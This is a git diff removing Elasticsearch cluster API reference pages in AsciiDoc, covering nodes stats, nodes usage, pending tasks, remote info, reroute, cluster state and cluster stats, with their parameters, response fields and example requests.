-+ -.Properties of `processors` -[%collapsible%open] -========= -``:: -(object) -Contains statistics for the ingest processor. -+ -.Properties of `` -[%collapsible%open] -========== -`count`:: -(integer) -Number of documents transformed by the processor. - -`time`:: -(<>) -Time spent by the processor transforming documents. - -`time_in_millis`:: -(integer) -Time, in milliseconds, spent by the processor transforming documents. - -`current`:: -(integer) -Number of documents currently being transformed by the processor. - -`failed`:: -(integer) -Number of failed operations for the processor. -========== -========= -======== -======= -====== - -[[cluster-nodes-stats-api-response-body-indexing-pressure]] -`indexing_pressure`:: -(object) -Contains <> statistics for the node. -+ -.Properties of `indexing_pressure` -[%collapsible%open] -====== -`memory`:: -(object) -Contains statistics for memory consumption from indexing load. -+ -.Properties of `` -[%collapsible%open] -======= -`current`:: -(object) -Contains statistics for current indexing load. -+ -.Properties of `` -[%collapsible%open] -======== -`combined_coordinating_and_primary`:: -(<>) -Memory consumed by indexing requests in the coordinating or primary stage. This -value is not the sum of coordinating and primary as a node can reuse the -coordinating memory if the primary stage is executed locally. - -`combined_coordinating_and_primary_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the coordinating or primary -stage. This value is not the sum of coordinating and primary as a node can -reuse the coordinating memory if the primary stage is executed locally. - -`coordinating`:: -(<>) -Memory consumed by indexing requests in the coordinating stage. - -`coordinating_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the coordinating stage. - -`primary`:: -(<>) -Memory consumed by indexing requests in the primary stage. - -`primary_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the primary stage. - -`replica`:: -(<>) -Memory consumed by indexing requests in the replica stage. - -`replica_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the replica stage. - -`all`:: -(<>) -Memory consumed by indexing requests in the coordinating, primary, or replica stage. - -`all_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the coordinating, primary, -or replica stage. -======== -`total`:: -(object) -Contains statistics for the cumulative indexing load since the node started. -+ -.Properties of `` -[%collapsible%open] -======== -`combined_coordinating_and_primary`:: -(<>) -Memory consumed by indexing requests in the coordinating or primary stage. This -value is not the sum of coordinating and primary as a node can reuse the -coordinating memory if the primary stage is executed locally. - -`combined_coordinating_and_primary_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the coordinating or primary -stage. This value is not the sum of coordinating and primary as a node can -reuse the coordinating memory if the primary stage is executed locally. - -`coordinating`:: -(<>) -Memory consumed by indexing requests in the coordinating stage. - -`coordinating_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the coordinating stage. - -`primary`:: -(<>) -Memory consumed by indexing requests in the primary stage. - -`primary_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the primary stage. - -`replica`:: -(<>) -Memory consumed by indexing requests in the replica stage. - -`replica_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the replica stage. - -`all`:: -(<>) -Memory consumed by indexing requests in the coordinating, primary, or replica stage. - -`all_in_bytes`:: -(integer) -Memory consumed, in bytes, by indexing requests in the coordinating, primary, -or replica stage. - -`coordinating_rejections`:: -(integer) -Number of indexing requests rejected in the coordinating stage. - -`primary_rejections`:: -(integer) -Number of indexing requests rejected in the primary stage. - -`replica_rejections`:: -(integer) -Number of indexing requests rejected in the replica stage. -======== -`limit`:: -(<>) -Configured memory limit for the indexing requests. Replica requests have an -automatic limit that is 1.5x this value. - -`limit_in_bytes`:: -(integer) -Configured memory limit, in bytes, for the indexing requests. Replica requests -have an automatic limit that is 1.5x this value. -======= -====== - -[[cluster-nodes-stats-api-response-body-adaptive-selection]] -`adaptive_selection`:: -(object) -Contains adaptive selection statistics for the node. -+ -.Properties of `adaptive_selection` -[%collapsible%open] -====== -`outgoing_searches`:: -(integer) -The number of outstanding search requests from the node these stats are for -to the keyed node. - -`avg_queue_size`:: -(integer) -The exponentially weighted moving average queue size of search requests on -the keyed node. - -`avg_service_time`:: -(<>) -The exponentially weighted moving average service time of search requests on -the keyed node. - -`avg_service_time_ns`:: -(integer) -The exponentially weighted moving average service time, in nanoseconds, of -search requests on the keyed node. - -`avg_response_time`:: -(<>) -The exponentially weighted moving average response time of search requests -on the keyed node. - -`avg_response_time_ns`:: -(integer) -The exponentially weighted moving average response time, in nanoseconds, of -search requests on the keyed node. - -`rank`:: -(string) -The rank of this node; used for shard selection when routing search -requests. -====== -===== -==== - -[[cluster-nodes-stats-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -# return just indices -GET /_nodes/stats/indices - -# return just os and process -GET /_nodes/stats/os,process - -# return just process for node with IP address 10.0.0.1 -GET /_nodes/10.0.0.1/stats/process --------------------------------------------------- - -All stats can be explicitly requested via `/_nodes/stats/_all` or -`/_nodes/stats?metric=_all`. - -You can get information about indices stats on `node`, `indices`, or `shards` -level. - -[source,console] --------------------------------------------------- -# Fielddata summarized by node -GET /_nodes/stats/indices/fielddata?fields=field1,field2 - -# Fielddata summarized by node and index -GET /_nodes/stats/indices/fielddata?level=indices&fields=field1,field2 - -# Fielddata summarized by node, index, and shard -GET /_nodes/stats/indices/fielddata?level=shards&fields=field1,field2 - -# You can use wildcards for field names -GET /_nodes/stats/indices/fielddata?fields=field* --------------------------------------------------- - -You can get statistics about search groups for searches executed -on this node. - -[source,console] --------------------------------------------------- -# All groups with all stats -GET /_nodes/stats?groups=_all - -# Some groups from just the indices stats -GET /_nodes/stats/indices?groups=foo,bar --------------------------------------------------- - -[[cluster-nodes-stats-ingest-ex]] -===== Retrieve ingest statistics only - -To return only ingest-related node statistics, set the `` path -parameter to `ingest` and use the -<> query parameter. - -[source,console] --------------------------------------------------- -GET /_nodes/stats/ingest?filter_path=nodes.*.ingest --------------------------------------------------- - -You can use the `metric` and `filter_path` query parameters to get the same -response. - -[source,console] --------------------------------------------------- -GET /_nodes/stats?metric=ingest&filter_path=nodes.*.ingest --------------------------------------------------- - -To further refine the response, change the `filter_path` value. -For example, the following request only returns ingest pipeline statistics. - -[source,console] --------------------------------------------------- -GET /_nodes/stats?metric=ingest&filter_path=nodes.*.ingest.pipelines --------------------------------------------------- diff --git a/docs/reference/cluster/nodes-usage.asciidoc b/docs/reference/cluster/nodes-usage.asciidoc deleted file mode 100644 index c62c42a5722..00000000000 --- a/docs/reference/cluster/nodes-usage.asciidoc +++ /dev/null @@ -1,110 +0,0 @@ -[[cluster-nodes-usage]] -=== Nodes feature usage API -++++ -Nodes feature usage -++++ - -Returns information on the usage of features. - - -[[cluster-nodes-usage-api-request]] -==== {api-request-title} - -`GET /_nodes/usage` + - -`GET /_nodes//usage` + - -`GET /_nodes/usage/` + - -`GET /_nodes//usage/` - -[[cluster-nodes-usage-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-nodes-usage-api-desc]] -==== {api-description-title} - -The cluster nodes usage API allows you to retrieve information on the usage -of features for each node. All the nodes selective options are explained -<>. - - -[[cluster-nodes-usage-api-path-params]] -==== {api-path-parms-title} - -``:: - (Optional, string) Limits the information returned to the specific metrics. - A comma-separated list of the following options: -+ --- - `_all`:: - Returns all stats. - - `rest_actions`:: - Returns the REST actions classname with a count of the number of times - that action has been called on the node. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id] - - -[[cluster-nodes-usage-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[cluster-nodes-usage-api-example]] -==== {api-examples-title} - -Rest action example: - -[source,console] --------------------------------------------------- -GET _nodes/usage --------------------------------------------------- -// TEST[setup:node] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "_nodes": { - "total": 1, - "successful": 1, - "failed": 0 - }, - "cluster_name": "my_cluster", - "nodes": { - "pQHNt5rXTTWNvUgOrdynKg": { - "timestamp": 1492553961812, <1> - "since": 1492553906606, <2> - "rest_actions": { - "nodes_usage_action": 1, - "create_index_action": 1, - "document_get_action": 1, - "search_action": 19, <3> - "nodes_info_action": 36 - }, - "aggregations": { - ... - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"my_cluster"/$body.cluster_name/] -// TESTRESPONSE[s/"pQHNt5rXTTWNvUgOrdynKg"/\$node_name/] -// TESTRESPONSE[s/1492553961812/$body.$_path/] -// TESTRESPONSE[s/1492553906606/$body.$_path/] -// TESTRESPONSE[s/"rest_actions": [^}]+}/"rest_actions": $body.$_path/] -// TESTRESPONSE[s/"aggregations": [^}]+}/"aggregations": $body.$_path/] -<1> Timestamp for when this nodes usage request was performed. -<2> Timestamp for when the usage information recording was started. This is -equivalent to the time that the node was started. -<3> Search action has been called 19 times for this node. - diff --git a/docs/reference/cluster/pending.asciidoc b/docs/reference/cluster/pending.asciidoc deleted file mode 100644 index b7d73b79410..00000000000 --- a/docs/reference/cluster/pending.asciidoc +++ /dev/null @@ -1,102 +0,0 @@ -[[cluster-pending]] -=== Pending cluster tasks API -++++ -Pending cluster tasks -++++ - -Returns cluster-level changes that have not yet been executed. - - -[[cluster-pending-api-request]] -==== {api-request-title} - -`GET /_cluster/pending_tasks` - -[[cluster-pending-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-pending-api-desc]] -==== {api-description-title} - -The pending cluster tasks API returns a list of any cluster-level changes (e.g. -create index, update mapping, allocate or fail shard) which have not yet been -executed. - -NOTE: This API returns a list of any pending updates to the cluster state. These are distinct from the tasks reported by the -<> which include periodic tasks and tasks initiated by the user, such as node stats, search queries, or create -index requests. However, if a user-initiated task such as a create index command causes a cluster state update, the activity of this task -might be reported by both task api and pending cluster tasks API. - - -[[cluster-pending-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - - -[[cluster-pending-api-response-body]] -==== {api-response-body-title} - -`tasks`:: - (object) A list of pending tasks. - -`insert_order`:: - (integer) The number that represents when the task has been inserted into - the task queue. - -`priority`:: - (string) The priority of the pending task. - -`source`:: - (string) A general description of the cluster task that may include a reason - and origin. - -`time_in_queue_millis`:: - (integer) The time expressed in milliseconds since the task is waiting for - being performed. - -`time_in_queue`:: - (string) The time since the task is waiting for being performed. - - -[[cluster-pending-api-example]] -==== {api-examples-title} - -Usually the request will return an empty list as cluster-level changes are fast. -However, if there are tasks queued up, the response will look similar like this: - -[source,js] --------------------------------------------------- -{ - "tasks": [ - { - "insert_order": 101, - "priority": "URGENT", - "source": "create-index [foo_9], cause [api]", - "time_in_queue_millis": 86, - "time_in_queue": "86ms" - }, - { - "insert_order": 46, - "priority": "HIGH", - "source": "shard-started ([foo_2][1], node[tMTocMvQQgGCkj7QDHl3OA], [P], s[INITIALIZING]), reason [after recovery from shard_store]", - "time_in_queue_millis": 842, - "time_in_queue": "842ms" - }, - { - "insert_order": 45, - "priority": "HIGH", - "source": "shard-started ([foo_2][0], node[tMTocMvQQgGCkj7QDHl3OA], [P], s[INITIALIZING]), reason [after recovery from shard_store]", - "time_in_queue_millis": 858, - "time_in_queue": "858ms" - } - ] -} --------------------------------------------------- -// NOTCONSOLE -// We can't test tasks output diff --git a/docs/reference/cluster/remote-info.asciidoc b/docs/reference/cluster/remote-info.asciidoc deleted file mode 100644 index bbcc2321c12..00000000000 --- a/docs/reference/cluster/remote-info.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ -[[cluster-remote-info]] -=== Remote cluster info API -++++ -Remote cluster info -++++ - -Returns configured remote cluster information. - - -[[cluster-remote-info-api-request]] -==== {api-request-title} - -`GET /_remote/info` - -[[cluster-remote-info-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-remote-info-api-desc]] -==== {api-description-title} - -The cluster remote info API allows you to retrieve all of the configured -remote cluster information. It returns connection and endpoint information keyed -by the configured remote cluster alias. - - -[[cluster-remote-info-api-response-body]] -==== {api-response-body-title} - -`mode`:: - Connection mode for the remote cluster. Returned values are `sniff` and - `proxy`. - -`connected`:: - True if there is at least one connection to the remote cluster. - -`initial_connect_timeout`:: - The initial connect timeout for remote cluster connections. - -[[skip-unavailable]] -`skip_unavailable`:: - Whether the remote cluster is skipped in case it is searched through - a {ccs} request but none of its nodes are available. - -`seeds`:: - Initial seed transport addresses of the remote cluster when sniff mode is - configured. - -`num_nodes_connected`:: - Number of connected nodes in the remote cluster when sniff mode is - configured. - -`max_connections_per_cluster`:: - Maximum number of connections maintained for the remote cluster when sniff - mode is configured. - -`proxy_address`:: - Address for remote connections when proxy mode is configured. - -`num_proxy_sockets_connected`:: - Number of open socket connections to the remote cluster when proxy mode - is configured. - -`max_proxy_socket_connections`:: - The maximum number of socket connections to the remote cluster when proxy - mode is configured. diff --git a/docs/reference/cluster/reroute.asciidoc b/docs/reference/cluster/reroute.asciidoc deleted file mode 100644 index c496cdc295a..00000000000 --- a/docs/reference/cluster/reroute.asciidoc +++ /dev/null @@ -1,210 +0,0 @@ -[[cluster-reroute]] -=== Cluster reroute API -++++ -Cluster reroute -++++ - -Changes the allocation of shards in a cluster. - - -[[cluster-reroute-api-request]] -==== {api-request-title} - -`POST /_cluster/reroute` - -[[cluster-reroute-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage` -<> to use this API. - -[[cluster-reroute-api-desc]] -==== {api-description-title} - -The reroute command allows for manual changes to the allocation of individual -shards in the cluster. For example, a shard can be moved from one node to -another explicitly, an allocation can be cancelled, and an unassigned shard can -be explicitly allocated to a specific node. - -It is important to note that after processing any reroute commands {es} will -perform rebalancing as normal (respecting the values of settings such as -`cluster.routing.rebalance.enable`) in order to remain in a balanced state. For -example, if the requested allocation includes moving a shard from `node1` to -`node2` then this may cause a shard to be moved from `node2` back to `node1` to -even things out. - -The cluster can be set to disable allocations using the -`cluster.routing.allocation.enable` setting. If allocations are disabled then -the only allocations that will be performed are explicit ones given using the -`reroute` command, and consequent allocations due to rebalancing. - -It is possible to run `reroute` commands in "dry run" mode by using the -`?dry_run` URI query parameter, or by passing `"dry_run": true` in the request -body. This will calculate the result of applying the commands to the current -cluster state, and return the resulting cluster state after the commands (and -re-balancing) has been applied, but will not actually perform the requested -changes. - -If the `?explain` URI query parameter is included then a detailed explanation -of why the commands could or could not be executed is included in the response. - -The cluster will attempt to allocate a shard a maximum of -`index.allocation.max_retries` times in a row (defaults to `5`), before giving -up and leaving the shard unallocated. This scenario can be caused by -structural problems such as having an analyzer which refers to a stopwords -file which doesn't exist on all nodes. - -Once the problem has been corrected, allocation can be manually retried by -calling the `reroute` API with the `?retry_failed` URI -query parameter, which will attempt a single retry round for these shards. - - -[[cluster-reroute-api-query-params]] -[role="child_attributes"] -==== {api-query-parms-title} - -`dry_run`:: - (Optional, Boolean) If `true`, then the request simulates the operation only - and returns the resulting state. - -`explain`:: - (Optional, Boolean) If `true`, then the response contains an explanation of - why the commands can or cannot be executed. - -`metric`:: - (Optional, string) Limits the information returned to the specified metrics. - Defaults to all but metadata The following options are available: - -+ -.Options for `metric` -[%collapsible%open] -====== -`_all`:: - Shows all metrics. - -`blocks`:: - Shows the `blocks` part of the response. - -`master_node`:: - Shows the elected `master_node` part of the response. - -`metadata`:: - Shows the `metadata` part of the response. If you supply a comma separated - list of indices, the returned output will only contain metadata for these - indices. - -`nodes`:: - Shows the `nodes` part of the response. - -`routing_table`:: - Shows the `routing_table` part of the response. - -`version`:: - Shows the cluster state version. -====== - - -`retry_failed`:: - (Optional, Boolean) If `true`, then retries allocation of shards that are - blocked due to too many subsequent allocation failures. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[role="child_attributes"] -[[cluster-reroute-api-request-body]] -==== {api-request-body-title} - -`commands`:: - (Required, array of objects) Defines the commands to perform. Supported commands are: - -+ -.Properties of `commands` -[%collapsible%open] -====== - -`move`:: - Move a started shard from one node to another node. Accepts `index` and - `shard` for index name and shard number, `from_node` for the node to move - the shard from, and `to_node` for the node to move the shard to. - -`cancel`:: - Cancel allocation of a shard (or recovery). Accepts `index` and `shard` for - index name and shard number, and `node` for the node to cancel the shard - allocation on. This can be used to force resynchronization of existing - replicas from the primary shard by cancelling them and allowing them to be - reinitialized through the standard recovery process. By default only - replica shard allocations can be cancelled. If it is necessary to cancel - the allocation of a primary shard then the `allow_primary` flag must also - be included in the request. - -`allocate_replica`:: - Allocate an unassigned replica shard to a node. Accepts `index` and `shard` - for index name and shard number, and `node` to allocate the shard to. Takes - <> into account. - -Two more commands are available that allow the allocation of a primary shard to -a node. These commands should however be used with extreme care, as primary -shard allocation is usually fully automatically handled by {es}. Reasons why a -primary shard cannot be automatically allocated include the -following: - -- A new index was created but there is no node which satisfies the allocation - deciders. -- An up-to-date shard copy of the data cannot be found on the current data - nodes in the cluster. To prevent data loss, the system does not automatically -promote a stale shard copy to primary. - -The following two commands are dangerous and may result in data loss. They are -meant to be used in cases where the original data can not be recovered and the -cluster administrator accepts the loss. If you have suffered a temporary issue -that can be fixed, please see the `retry_failed` flag described above. To -emphasise: if these commands are performed and then a node joins the cluster -that holds a copy of the affected shard then the copy on the newly-joined node -will be deleted or overwritten. - -`allocate_stale_primary`:: - Allocate a primary shard to a node that holds a stale copy. Accepts the - `index` and `shard` for index name and shard number, and `node` to allocate - the shard to. Using this command may lead to data loss for the provided - shard id. If a node which has the good copy of the data rejoins the cluster - later on, that data will be deleted or overwritten with the data of the - stale copy that was forcefully allocated with this command. To ensure that - these implications are well-understood, this command requires the flag - `accept_data_loss` to be explicitly set to `true`. - -`allocate_empty_primary`:: - Allocate an empty primary shard to a node. Accepts the `index` and `shard` - for index name and shard number, and `node` to allocate the shard to. Using - this command leads to a complete loss of all data that was indexed into - this shard, if it was previously started. If a node which has a copy of the - data rejoins the cluster later on, that data will be deleted. To ensure - that these implications are well-understood, this command requires the flag - `accept_data_loss` to be explicitly set to `true`. -====== - -[[cluster-reroute-api-example]] -==== {api-examples-title} - -This is a short example of a simple reroute API call: - -[source,console] --------------------------------------------------- -POST /_cluster/reroute -{ - "commands": [ - { - "move": { - "index": "test", "shard": 0, - "from_node": "node1", "to_node": "node2" - } - }, - { - "allocate_replica": { - "index": "test", "shard": 1, - "node": "node3" - } - } - ] -} --------------------------------------------------- -// TEST[skip:doc tests run with only a single node] diff --git a/docs/reference/cluster/state.asciidoc b/docs/reference/cluster/state.asciidoc deleted file mode 100644 index 160153ee5e5..00000000000 --- a/docs/reference/cluster/state.asciidoc +++ /dev/null @@ -1,161 +0,0 @@ -[[cluster-state]] -=== Cluster state API -++++ -Cluster state -++++ - -Returns metadata about the state of the cluster. - -[[cluster-state-api-request]] -==== {api-request-title} - -`GET /_cluster/state//` - -[[cluster-state-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-state-api-desc]] -==== {api-description-title} - -The cluster state API allows access to metadata representing the state of the -whole cluster. This includes information such as - -* the set of nodes in the cluster - -* all cluster-level settings - -* information about the indices in the cluster, including their mappings and - settings - -* the locations of all the shards in the cluster. - -NOTE: The response is an internal representation of the cluster state and its -format may change from version to version. If possible, you should obtain any -information from the cluster state using the other, more stable, -<>. - -The response provides the cluster state itself, which can be filtered to only -retrieve the parts of interest as described below. - -The cluster's `cluster_uuid` is also returned as part of the top-level response, -in addition to the `metadata` section. added[6.4.0] - -NOTE: While the cluster is still forming, it is possible for the `cluster_uuid` - to be `_na_` as well as the cluster state's version to be `-1`. - -By default, the cluster state request is routed to the master node, to ensure -that the latest cluster state is returned. For debugging purposes, you can -retrieve the cluster state local to a particular node by adding `local=true` to -the query string. - -[[cluster-state-api-path-params]] -==== {api-path-parms-title} - -The cluster state contains information about all the indices in the cluster, -including their mappings, as well as templates and other metadata. This means it -can sometimes be quite large. To avoid the need to process all this information -you can request only the part of the cluster state that you need: - -``:: - (Optional, string) A comma-separated list of the following options: -+ --- - `_all`:: - Shows all metrics. - - `blocks`:: - Shows the `blocks` part of the response. - - `master_node`:: - Shows the elected `master_node` part of the response. - - `metadata`:: - Shows the `metadata` part of the response. If you supply a comma separated - list of indices, the returned output will only contain metadata for these - indices. - - `nodes`:: - Shows the `nodes` part of the response. - - `routing_nodes`:: - Shows the `routing_nodes` part of the response. - - `routing_table`:: - Shows the `routing_table` part of the response. If you supply a comma - separated list of indices, the returned output will only contain the - routing table for these indices. - - `version`:: - Shows the cluster state version. --- - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[cluster-state-api-query-params]] -==== {api-query-parms-title} - -`allow_no_indices`:: - (Optional, Boolean) If `true`, the wildcard indices expression that resolves - into no concrete indices will be ignored. (This includes `_all` string or - when no indices have been specified). -+ -Defaults to `true`. - -`expand_wildcards`:: - (Optional, string) Whether to expand wildcard expression to concrete indices - that are open, closed or both. Available options: `open`, `closed`, `none`, - `all`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -`ignore_unavailable`:: - (Optional, Boolean) If `true`, unavailable indices (missing or closed) will - be ignored. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -`wait_for_metadata_version`:: - (Optional, integer) Waits for the metadata version to be equal or greater - than the specified metadata version. - -`wait_for_timeout`:: - (Optional, <>) Specifies the maximum time to wait - for wait_for_metadata_version before timing out. - - -[[cluster-state-api-example]] -==== {api-examples-title} - -The following example returns only `metadata` and `routing_table` data for the -`foo` and `bar` data streams or indices: - -[source,console] --------------------------------------------------- -GET /_cluster/state/metadata,routing_table/foo,bar --------------------------------------------------- - -The next example returns all available metadata for `foo` and `bar`: - -[source,console] --------------------------------------------------- -GET /_cluster/state/_all/foo,bar --------------------------------------------------- - -This example returns only the `blocks` metadata: - -[source,console] --------------------------------------------------- -GET /_cluster/state/blocks --------------------------------------------------- diff --git a/docs/reference/cluster/stats.asciidoc b/docs/reference/cluster/stats.asciidoc deleted file mode 100644 index fecd0208550..00000000000 --- a/docs/reference/cluster/stats.asciidoc +++ /dev/null @@ -1,1356 +0,0 @@ -[[cluster-stats]] -=== Cluster stats API -++++ -Cluster stats -++++ - -Returns cluster statistics. - - -[[cluster-stats-api-request]] -==== {api-request-title} - -`GET /_cluster/stats` + - -`GET /_cluster/stats/nodes/` - -[[cluster-stats-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[cluster-stats-api-desc]] -==== {api-description-title} - -The Cluster Stats API allows to retrieve statistics from a cluster wide -perspective. The API returns basic index metrics (shard numbers, store size, -memory usage) and information about the current nodes that form the cluster -(number, roles, os, jvm versions, memory usage, cpu and installed plugins). - - -[[cluster-stats-api-path-params]] -==== {api-path-parms-title} - - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-filter] - - -[[cluster-stats-api-query-params]] -==== {api-query-parms-title} - -`timeout`:: -(Optional, <>) -Period to wait for each node to respond. If a node does not respond before its -timeout expires, the response does not include its stats. However, timed out -nodes are included in the response's `_nodes.failed` property. Defaults to no -timeout. - -[role="child_attributes"] -[[cluster-stats-api-response-body]] -==== {api-response-body-title} - -`_nodes`:: -(object) -Contains statistics about the number of nodes selected by the request's -<>. -+ -.Properties of `_nodes` -[%collapsible%open] -==== -`total`:: -(integer) -Total number of nodes selected by the request. - -`successful`:: -(integer) -Number of nodes that responded successfully to the request. - -`failed`:: -(integer) -Number of nodes that rejected the request or failed to respond. If this value -is not `0`, a reason for the rejection or failure is included in the response. -==== - -`cluster_name`:: -(string) -Name of the cluster, based on the <> setting. - -`cluster_uuid`:: -(string) -Unique identifier for the cluster. - -`timestamp`:: -(integer) -{wikipedia}/Unix_time[Unix timestamp], in milliseconds, of -the last time the cluster statistics were refreshed. - -`status`:: -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=cluster-health-status] -+ -See <>. - -[[cluster-stats-api-response-body-indices]] -`indices`:: -(object) -Contains statistics about indices with shards assigned to selected nodes. -+ -.Properties of `indices` -[%collapsible%open] -==== -`count`:: -(integer) -Total number of indices with shards assigned to selected nodes. - -`shards`:: -(object) -Contains statistics about shards assigned to selected nodes. -+ -.Properties of `shards` -[%collapsible%open] -===== -`total`:: -(integer) -Total number of shards assigned to selected nodes. - -`primaries`:: -(integer) -Number of primary shards assigned to selected nodes. - -`replication`:: -(float) -Ratio of replica shards to primary shards across all selected nodes. - -`index`:: -(object) -Contains statistics about shards assigned to selected nodes. -+ -.Properties of `index` -[%collapsible%open] -====== -`shards`:: -(object) -Contains statistics about the number of shards assigned to selected nodes. -+ -.Properties of `shards` -[%collapsible%open] -======= -`min`:: -(integer) -Minimum number of shards in an index, counting only shards assigned to -selected nodes. - -`max`:: -(integer) -Maximum number of shards in an index, counting only shards assigned to -selected nodes. - -`avg`:: -(float) -Mean number of shards in an index, counting only shards assigned to -selected nodes. -======= - -`primaries`:: -(object) -Contains statistics about the number of primary shards assigned to selected -nodes. -+ -.Properties of `primaries` -[%collapsible%open] -======= -`min`:: -(integer) -Minimum number of primary shards in an index, counting only shards assigned -to selected nodes. - -`max`:: -(integer) -Maximum number of primary shards in an index, counting only shards assigned -to selected nodes. - -`avg`:: -(float) -Mean number of primary shards in an index, counting only shards assigned to -selected nodes. -======= - -`replication`:: -(object) -Contains statistics about the number of replication shards assigned to selected -nodes. -+ -.Properties of `replication` -[%collapsible%open] -======= -`min`:: -(float) -Minimum replication factor in an index, counting only shards assigned to -selected nodes. - -`max`:: -(float) -Maximum replication factor in an index, counting only shards assigned to -selected nodes. - -`avg`:: -(float) -Mean replication factor in an index, counting only shards assigned to selected -nodes. -======= -====== -===== - -`docs`:: -(object) -Contains counts for documents in selected nodes. -+ -.Properties of `docs` -[%collapsible%open] -===== -`count`:: -(integer) -Total number of non-deleted documents across all primary shards assigned to -selected nodes. -+ -This number is based on documents in Lucene segments and may include documents -from nested fields. - -`deleted`:: -(integer) -Total number of deleted documents across all primary shards assigned to -selected nodes. -+ -This number is based on documents in Lucene segments. {es} reclaims the disk -space of deleted Lucene documents when a segment is merged. -===== - -`store`:: -(object) -Contains statistics about the size of shards assigned to selected nodes. -+ -.Properties of `store` -[%collapsible%open] -===== -`size`:: -(<>) -Total size of all shards assigned to selected nodes. - -`size_in_bytes`:: -(integer) -Total size, in bytes, of all shards assigned to selected nodes. - -`reserved`:: -(<>) -A prediction of how much larger the shard stores will eventually grow due to -ongoing peer recoveries, restoring snapshots, and similar activities. - -`reserved_in_bytes`:: -(integer) -A prediction, in bytes, of how much larger the shard stores will eventually -grow due to ongoing peer recoveries, restoring snapshots, and similar -activities. -===== - -`fielddata`:: -(object) -Contains statistics about the <> of selected nodes. -+ -.Properties of `fielddata` -[%collapsible%open] -===== -`memory_size`:: -(<>) -Total amount of memory used for the field data cache across all shards -assigned to selected nodes. - -`memory_size_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for the field data cache across all -shards assigned to selected nodes. - -`evictions`:: -(integer) -Total number of evictions from the field data cache across all shards assigned -to selected nodes. -===== - -`query_cache`:: -(object) -Contains statistics about the query cache of selected nodes. -+ -.Properties of `query_cache` -[%collapsible%open] -===== -`memory_size`:: -(<>) -Total amount of memory used for the query cache across all shards assigned to -selected nodes. - -`memory_size_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for the query cache across all shards -assigned to selected nodes. - -`total_count`:: -(integer) -Total count of hits and misses in the query cache across all shards assigned to -selected nodes. - -`hit_count`:: -(integer) -Total count of query cache hits across all shards assigned to selected nodes. - -`miss_count`:: -(integer) -Total count of query cache misses across all shards assigned to selected nodes. - -`cache_size`:: -(integer) -Total number of entries currently in the query cache across all shards assigned -to selected nodes. - -`cache_count`:: -(integer) -Total number of entries added to the query cache across all shards assigned -to selected nodes. This number includes current and evicted entries. - -`evictions`:: -(integer) -Total number of query cache evictions across all shards assigned to selected -nodes. -===== - -`completion`:: -(object) -Contains statistics about memory used for completion in selected nodes. -+ -.Properties of `completion` -[%collapsible%open] -===== -`size`:: -(<>) -Total amount of memory used for completion across all shards assigned to -selected nodes. - -`size_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for completion across all shards assigned -to selected nodes. -===== - -`segments`:: -(object) -Contains statistics about segments in selected nodes. -+ -.Properties of `segments` -[%collapsible%open] -===== -`count`:: -(integer) -Total number of segments across all shards assigned to selected nodes. - -`memory`:: -(<>) -Total amount of memory used for segments across all shards assigned to selected -nodes. - -`memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for segments across all shards assigned to -selected nodes. - -`terms_memory`:: -(<>) -Total amount of memory used for terms across all shards assigned to selected -nodes. - -`terms_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for terms across all shards assigned to -selected nodes. - -`stored_fields_memory`:: -(<>) -Total amount of memory used for stored fields across all shards assigned to -selected nodes. - -`stored_fields_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for stored fields across all shards -assigned to selected nodes. - -`term_vectors_memory`:: -(<>) -Total amount of memory used for term vectors across all shards assigned to -selected nodes. - -`term_vectors_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for term vectors across all shards -assigned to selected nodes. - -`norms_memory`:: -(<>) -Total amount of memory used for normalization factors across all shards assigned -to selected nodes. - -`norms_memory_in_bytes`:: -(integer) -Total amount, in bytes, of memory used for normalization factors across all -shards assigned to selected nodes. - -`points_memory`:: -(<>) -Total amount of memory used for points across all shards assigned to selected -nodes. - 